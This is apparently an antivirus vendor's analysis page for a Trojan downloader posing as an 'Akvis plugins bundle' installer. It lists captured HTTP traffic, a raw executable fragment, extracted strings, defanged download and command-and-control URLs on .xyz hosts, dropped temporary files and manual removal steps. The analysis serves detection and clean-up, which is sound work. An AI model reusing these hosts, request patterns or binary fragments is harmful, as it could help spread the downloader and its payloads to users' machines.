A HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
;.<TITLE>ERROR: The request could not be satisfied</TITLE>
.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The re
quest could not be satisfied.</H2>.<HR noshade size="1px">
.This distribution is not configured to allow the HTTP request method
that was used for this request. The distribution supports only cachabl
e requests..<BR clear="all">.<HR noshade size="1px">.<P
RE>.Generated by cloudfront (CloudFront).Request ID: eaaTCVbkQ96IYk
ytGIM4o1FCr2G_J5cXyUEdIxMQvcikmW8M9SFfcQ==.</PRE>.<ADDRESS>
;.</ADDRESS>.</BODY></HTML>..
GET /?affId=1006&appTitle=Akvis%20plugins%20bundle%202015%20for%20&s1=1505&s2=4432169&setupName=cpSetup&appVersion=2.92&instId=11 HTTP/1.0
Host: get.skdfw8hfjskdf.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 96438
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="cpSetup.exe"
Date: Wed, 18 Nov 2015 23:32:18 GMT
X-Cache: Miss from cloudfront
Via: 1.1 dbf9786017ce18e598e331983c931691.cloudfront.net (CloudFront)
X-Amz-Cf-Id: WIPGjvT4E5QURCrl1VmJ81rX-m7WOsK5CTw7YUvGR3S0L__2AXhJGw==MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....\
.U.................^...........2.......p....@.........................
[email protected].......... -........
...................................................................p..
.............................text...:\.......^.................. ..`.r
data.......p.......b..............@[email protected]..........
[email protected][email protected]... -...........x
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] ...Pj.h./[email protected]...\r@._
^3.[.....L$..(7B...Si.....VW.T.....tO.q.3.;5,7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5,7B.r._^[...U..QQ.U.SV..i.<<< skipped >>>
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
WS2_32.dll
NSISdl.dll
.reloc
System.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>
KERNEL32.DLL
ADVAPI32.DLL
GDI32.DLL
MSVBVM60.DLL
OLEAUT32.DLL
USER32.DLL
RegEnumKeyExW
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")Exec: success ("%s")Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")ExecShell: warning: error ("%s": file:"%s" params:"%s")=%dExch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")RMDir: RemoveDirectory on Reboot("%s")RMDir: RemoveDirectory("%s")RMDir: RemoveDirectory invalid input("%s")Delete: DeleteFile failed("%s")Delete: DeleteFile on Reboot("%s")Delete: DeleteFile("%s")%s: failed opening file "%s"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso2.tmp\29knoHNwu6.exe
ip&tid=4432169&pid=1505&b_typ=pe&reb=1&name=Akvis plugins bundle 2015 for adobe photoshop 28.03.2015 [240815BAP]
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso2.tmp
?program=sevenzip&tid=4432169&pid=1505&b_typ=pe&reb=1&name=Akvis plugins bundle 2015 for adobe photoshop 28.03.2015 [240815BAP]
Software\Microsoft\Windows\CurrentVersion\Internet Settings
callback%d
kernel32.dll
2002-2013
Registry Trash Keys Finder
3.9.2.1
TrashReg.exe
nso2.tmp
Exec: success ("C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso2.tmp\29knoHNwu6.exe").tmp\NSISdl.dll"
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nso2.tmp\z7w2hGXrwB
venzip&tid=4432169&pid=1505&b_typ=pe&reb=1&name=Akvis plugins bundle 2015 for adobe photoshop 28.03.2015 [240815BAP]
l.ic-ftree34.xyz/stub_maker.php?program=sevenzip&tid=4432169&pid=1505&b_typ=pe&reb=1&name=Akvis plugins bundle 2015 for adobe photoshop 28.03.2015 [240815BAP]
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
201511182332
hXXp://dl.ic-ftree34.xyz/stub_maker.php?program=sevenzip&tid=4432169&pid=1505&b_typ=pe&reb=1&name=Akvis plugins bundle 2015 for adobe photoshop 28.03.2015 [240815BAP]
29knoHNwu6.exe_2020:
64*46%*56
.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
.liAB
Y<6;(:* ),"
4$/8&0.=-%"!
8759<6;(:* )"
4$/&0.=-!
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
WS2_32.dll
NSISdl.dll
l;`]w`#r%s
7.rdata
KERNEL32.DLL
nsArray.dll
Join
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")Exec: success ("%s")Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")ExecShell: warning: error ("%s": file:"%s" params:"%s")=%dExch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")RMDir: RemoveDirectory on Reboot("%s")RMDir: RemoveDirectory("%s")RMDir: RemoveDirectory invalid input("%s")Delete: DeleteFile failed("%s")Delete: DeleteFile on Reboot("%s")Delete: DeleteFile("%s")%s: failed opening file "%s"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\cpSetup.exe"
98/SevenZip_downloader-Qcg5Ev1hD.exe
plugins%20bundle%202015%20for%20&producturl=http://d3pccup19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4432169
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\NSISdl.dll
%Program Files%
\NSISdl.dll
\613611024
hXXp://up.sdfj38wrhsfi.xyz/stats.php?bu=
\nsArray.dll
ar_url
\\613611024
hXXp://up.jfs7d6fsduifh.xyz/error.php?string=
hXXp://up.sdfuus98d7f.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4432169&b_typ=pe&n=
hXXp://up.sfd973rfs.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4432169&b_typ=pe&n=
/key=
Nullsoft Install System (Unicode) v2.46.5-Unicode
\wininit.ini
Software\Microsoft\Windows\CurrentVersion\Internet Settings
1.1.1.6
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp
cpSetup.exe
Exec: success (""C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\cpSetup.exe"")ISdl.dll"
is%20plugins%20bundle%202015%20for%20&s1=1505&s2=4432169&setupName=cpSetup&appVersion=2.92&instId=11
9xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4432169
3611024
198/SevenZip_downloader-Qcg5Ev1hD.exe
oader-Qcg5Ev1hD.exe
cli/1447887676198/SevenZip_downloader-Qcg5Ev1hD.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso2.tmp\29knoHNwu6.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso2.tmp
29knoHNwu6.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
7303712
hXXp://get.skdfw8hfjskdf.xyz/?affId=1006&appTitle=Akvis%20plugins%20bundle%202015%20for%20&s1=1505&s2=4432169&setupName=cpSetup&appVersion=2.92&instId=11
a2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4432169
nloader-Qcg5Ev1hD.exe
hXXp://up.sdfuus98d7f.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4432169&b_typ=pe&n=QWt2aXMgcGx1Z2lucyBidW5kbGUgMjAxNSBmb3Ig&reb=1&ic=
29knoHNwu6.exe_2020_rwx_10001000_00007000:
.text
`.rdata
@.data
.rsrc
@.reloc
/key=
cpSetup.exe_392:
.text
`.rdata
@.data
.ndata
.rsrc
Vj%SSS
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst8.tmp\140dd48f-80ec-40f2-ac12-cb23361e8ed3.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst8.tmp\140dd48f-80ec-40f2-ac12-cb23361e8ed3.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst8.tmp
:64!<:;^
p.NdxF<W
WUUUUUUUUUU5%UUij-89u#0'&<:;hrd{eru0;6:1<;2hr-06 !<:;
<6':&:3!{operator
GetProcessWindowStation
C:\tmp\gunch1112B\installcapital-master\Release\StubWrapper.pdb
StubWrapper.dll
GetProcessHeap
SHLWAPI.dll
GetCPInfo
zcÁ
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
4 4,414[4
6 6@6\6}6
; ;<;@;\;`;
UWt^TYUUeUUUEUUU%UU
eUUUUU%UUUEUUUUUUUQUUUUUUUUUUUUUU
.bn6o_
=.Tl#n
q.HI2Z
^1.Vj|
nst8.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst8.tmp
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\cpSetup.exe"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp
cpSetup.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\cpSetup.exe
:::#222.111 )))
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b2</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>USER32.DLL
cpSetup.exe_392_rwx_003E1000_0000A000:
hXXp://
GetProcessHeap
.text
`.rdata
@.data
.rsrc
@.reloc
.lHV.x
NQO/x7Location
.texl
9 `.rdata
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsu4.tmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\cpSetup.exe (10849 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\613611024 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd7.tmp (2250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst8.tmp\140dd48f-80ec-40f2-ac12-cb23361e8ed3.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0012ad40.a (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0012b58d.a (1701 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0012a33d.a (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp\z7w2hGXrwB (181 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp\29knoHNwu6.exe (7984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp\System.dll (11 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.